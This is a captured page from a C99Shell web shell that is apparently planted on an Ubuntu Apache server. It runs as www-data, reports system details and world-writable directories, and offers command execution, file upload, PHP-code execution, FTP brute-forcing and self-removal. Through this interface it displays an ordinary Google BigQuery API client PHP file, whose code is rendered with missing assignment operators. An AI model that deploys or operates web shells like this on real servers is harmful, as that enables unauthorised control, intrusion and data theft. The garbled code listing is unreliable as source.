!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/google/apiclient-services/src/Google/Service/Bigquery/   drwxrwxrwx
Free 13.03 GB of 57.97 GB (22.48%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     JobStatistics2.php (9.81 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

class Google_Service_Bigquery_JobStatistics2 extends Google_Collection
{
  protected 
$collection_key 'undeclaredQueryParameters';
  public 
$billingTier;
  public 
$cacheHit;
  public 
$ddlAffectedRowAccessPolicyCount;
  public 
$ddlOperationPerformed;
  protected 
$ddlTargetDatasetType 'Google_Service_Bigquery_DatasetReference';
  protected 
$ddlTargetDatasetDataType '';
  protected 
$ddlTargetRoutineType 'Google_Service_Bigquery_RoutineReference';
  protected 
$ddlTargetRoutineDataType '';
  protected 
$ddlTargetRowAccessPolicyType 'Google_Service_Bigquery_RowAccessPolicyReference';
  protected 
$ddlTargetRowAccessPolicyDataType '';
  protected 
$ddlTargetTableType 'Google_Service_Bigquery_TableReference';
  protected 
$ddlTargetTableDataType '';
  public 
$estimatedBytesProcessed;
  protected 
$modelTrainingType 'Google_Service_Bigquery_BigQueryModelTraining';
  protected 
$modelTrainingDataType '';
  public 
$modelTrainingCurrentIteration;
  public 
$modelTrainingExpectedTotalIteration;
  public 
$numDmlAffectedRows;
  protected 
$queryPlanType 'Google_Service_Bigquery_ExplainQueryStage';
  protected 
$queryPlanDataType 'array';
  protected 
$referencedRoutinesType 'Google_Service_Bigquery_RoutineReference';
  protected 
$referencedRoutinesDataType 'array';
  protected 
$referencedTablesType 'Google_Service_Bigquery_TableReference';
  protected 
$referencedTablesDataType 'array';
  protected 
$reservationUsageType 'Google_Service_Bigquery_JobStatistics2ReservationUsage';
  protected 
$reservationUsageDataType 'array';
  protected 
$schemaType 'Google_Service_Bigquery_TableSchema';
  protected 
$schemaDataType '';
  public 
$statementType;
  protected 
$timelineType 'Google_Service_Bigquery_QueryTimelineSample';
  protected 
$timelineDataType 'array';
  public 
$totalBytesBilled;
  public 
$totalBytesProcessed;
  public 
$totalBytesProcessedAccuracy;
  public 
$totalPartitionsProcessed;
  public 
$totalSlotMs;
  protected 
$undeclaredQueryParametersType 'Google_Service_Bigquery_QueryParameter';
  protected 
$undeclaredQueryParametersDataType 'array';

  public function 
setBillingTier($billingTier)
  {
    
$this->billingTier $billingTier;
  }
  public function 
getBillingTier()
  {
    return 
$this->billingTier;
  }
  public function 
setCacheHit($cacheHit)
  {
    
$this->cacheHit $cacheHit;
  }
  public function 
getCacheHit()
  {
    return 
$this->cacheHit;
  }
  public function 
setDdlAffectedRowAccessPolicyCount($ddlAffectedRowAccessPolicyCount)
  {
    
$this->ddlAffectedRowAccessPolicyCount $ddlAffectedRowAccessPolicyCount;
  }
  public function 
getDdlAffectedRowAccessPolicyCount()
  {
    return 
$this->ddlAffectedRowAccessPolicyCount;
  }
  public function 
setDdlOperationPerformed($ddlOperationPerformed)
  {
    
$this->ddlOperationPerformed $ddlOperationPerformed;
  }
  public function 
getDdlOperationPerformed()
  {
    return 
$this->ddlOperationPerformed;
  }
  
/**
   * @param Google_Service_Bigquery_DatasetReference
   */
  
public function setDdlTargetDataset(Google_Service_Bigquery_DatasetReference $ddlTargetDataset)
  {
    
$this->ddlTargetDataset $ddlTargetDataset;
  }
  
/**
   * @return Google_Service_Bigquery_DatasetReference
   */
  
public function getDdlTargetDataset()
  {
    return 
$this->ddlTargetDataset;
  }
  
/**
   * @param Google_Service_Bigquery_RoutineReference
   */
  
public function setDdlTargetRoutine(Google_Service_Bigquery_RoutineReference $ddlTargetRoutine)
  {
    
$this->ddlTargetRoutine $ddlTargetRoutine;
  }
  
/**
   * @return Google_Service_Bigquery_RoutineReference
   */
  
public function getDdlTargetRoutine()
  {
    return 
$this->ddlTargetRoutine;
  }
  
/**
   * @param Google_Service_Bigquery_RowAccessPolicyReference
   */
  
public function setDdlTargetRowAccessPolicy(Google_Service_Bigquery_RowAccessPolicyReference $ddlTargetRowAccessPolicy)
  {
    
$this->ddlTargetRowAccessPolicy $ddlTargetRowAccessPolicy;
  }
  
/**
   * @return Google_Service_Bigquery_RowAccessPolicyReference
   */
  
public function getDdlTargetRowAccessPolicy()
  {
    return 
$this->ddlTargetRowAccessPolicy;
  }
  
/**
   * @param Google_Service_Bigquery_TableReference
   */
  
public function setDdlTargetTable(Google_Service_Bigquery_TableReference $ddlTargetTable)
  {
    
$this->ddlTargetTable $ddlTargetTable;
  }
  
/**
   * @return Google_Service_Bigquery_TableReference
   */
  
public function getDdlTargetTable()
  {
    return 
$this->ddlTargetTable;
  }
  public function 
setEstimatedBytesProcessed($estimatedBytesProcessed)
  {
    
$this->estimatedBytesProcessed $estimatedBytesProcessed;
  }
  public function 
getEstimatedBytesProcessed()
  {
    return 
$this->estimatedBytesProcessed;
  }
  
/**
   * @param Google_Service_Bigquery_BigQueryModelTraining
   */
  
public function setModelTraining(Google_Service_Bigquery_BigQueryModelTraining $modelTraining)
  {
    
$this->modelTraining $modelTraining;
  }
  
/**
   * @return Google_Service_Bigquery_BigQueryModelTraining
   */
  
public function getModelTraining()
  {
    return 
$this->modelTraining;
  }
  public function 
setModelTrainingCurrentIteration($modelTrainingCurrentIteration)
  {
    
$this->modelTrainingCurrentIteration $modelTrainingCurrentIteration;
  }
  public function 
getModelTrainingCurrentIteration()
  {
    return 
$this->modelTrainingCurrentIteration;
  }
  public function 
setModelTrainingExpectedTotalIteration($modelTrainingExpectedTotalIteration)
  {
    
$this->modelTrainingExpectedTotalIteration $modelTrainingExpectedTotalIteration;
  }
  public function 
getModelTrainingExpectedTotalIteration()
  {
    return 
$this->modelTrainingExpectedTotalIteration;
  }
  public function 
setNumDmlAffectedRows($numDmlAffectedRows)
  {
    
$this->numDmlAffectedRows $numDmlAffectedRows;
  }
  public function 
getNumDmlAffectedRows()
  {
    return 
$this->numDmlAffectedRows;
  }
  
/**
   * @param Google_Service_Bigquery_ExplainQueryStage[]
   */
  
public function setQueryPlan($queryPlan)
  {
    
$this->queryPlan $queryPlan;
  }
  
/**
   * @return Google_Service_Bigquery_ExplainQueryStage[]
   */
  
public function getQueryPlan()
  {
    return 
$this->queryPlan;
  }
  
/**
   * @param Google_Service_Bigquery_RoutineReference[]
   */
  
public function setReferencedRoutines($referencedRoutines)
  {
    
$this->referencedRoutines $referencedRoutines;
  }
  
/**
   * @return Google_Service_Bigquery_RoutineReference[]
   */
  
public function getReferencedRoutines()
  {
    return 
$this->referencedRoutines;
  }
  
/**
   * @param Google_Service_Bigquery_TableReference[]
   */
  
public function setReferencedTables($referencedTables)
  {
    
$this->referencedTables $referencedTables;
  }
  
/**
   * @return Google_Service_Bigquery_TableReference[]
   */
  
public function getReferencedTables()
  {
    return 
$this->referencedTables;
  }
  
/**
   * @param Google_Service_Bigquery_JobStatistics2ReservationUsage[]
   */
  
public function setReservationUsage($reservationUsage)
  {
    
$this->reservationUsage $reservationUsage;
  }
  
/**
   * @return Google_Service_Bigquery_JobStatistics2ReservationUsage[]
   */
  
public function getReservationUsage()
  {
    return 
$this->reservationUsage;
  }
  
/**
   * @param Google_Service_Bigquery_TableSchema
   */
  
public function setSchema(Google_Service_Bigquery_TableSchema $schema)
  {
    
$this->schema $schema;
  }
  
/**
   * @return Google_Service_Bigquery_TableSchema
   */
  
public function getSchema()
  {
    return 
$this->schema;
  }
  public function 
setStatementType($statementType)
  {
    
$this->statementType $statementType;
  }
  public function 
getStatementType()
  {
    return 
$this->statementType;
  }
  
/**
   * @param Google_Service_Bigquery_QueryTimelineSample[]
   */
  
public function setTimeline($timeline)
  {
    
$this->timeline $timeline;
  }
  
/**
   * @return Google_Service_Bigquery_QueryTimelineSample[]
   */
  
public function getTimeline()
  {
    return 
$this->timeline;
  }
  public function 
setTotalBytesBilled($totalBytesBilled)
  {
    
$this->totalBytesBilled $totalBytesBilled;
  }
  public function 
getTotalBytesBilled()
  {
    return 
$this->totalBytesBilled;
  }
  public function 
setTotalBytesProcessed($totalBytesProcessed)
  {
    
$this->totalBytesProcessed $totalBytesProcessed;
  }
  public function 
getTotalBytesProcessed()
  {
    return 
$this->totalBytesProcessed;
  }
  public function 
setTotalBytesProcessedAccuracy($totalBytesProcessedAccuracy)
  {
    
$this->totalBytesProcessedAccuracy $totalBytesProcessedAccuracy;
  }
  public function 
getTotalBytesProcessedAccuracy()
  {
    return 
$this->totalBytesProcessedAccuracy;
  }
  public function 
setTotalPartitionsProcessed($totalPartitionsProcessed)
  {
    
$this->totalPartitionsProcessed $totalPartitionsProcessed;
  }
  public function 
getTotalPartitionsProcessed()
  {
    return 
$this->totalPartitionsProcessed;
  }
  public function 
setTotalSlotMs($totalSlotMs)
  {
    
$this->totalSlotMs $totalSlotMs;
  }
  public function 
getTotalSlotMs()
  {
    return 
$this->totalSlotMs;
  }
  
/**
   * @param Google_Service_Bigquery_QueryParameter[]
   */
  
public function setUndeclaredQueryParameters($undeclaredQueryParameters)
  {
    
$this->undeclaredQueryParameters $undeclaredQueryParameters;
  }
  
/**
   * @return Google_Service_Bigquery_QueryParameter[]
   */
  
public function getUndeclaredQueryParameters()
  {
    return 
$this->undeclaredQueryParameters;
  }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0068 ]--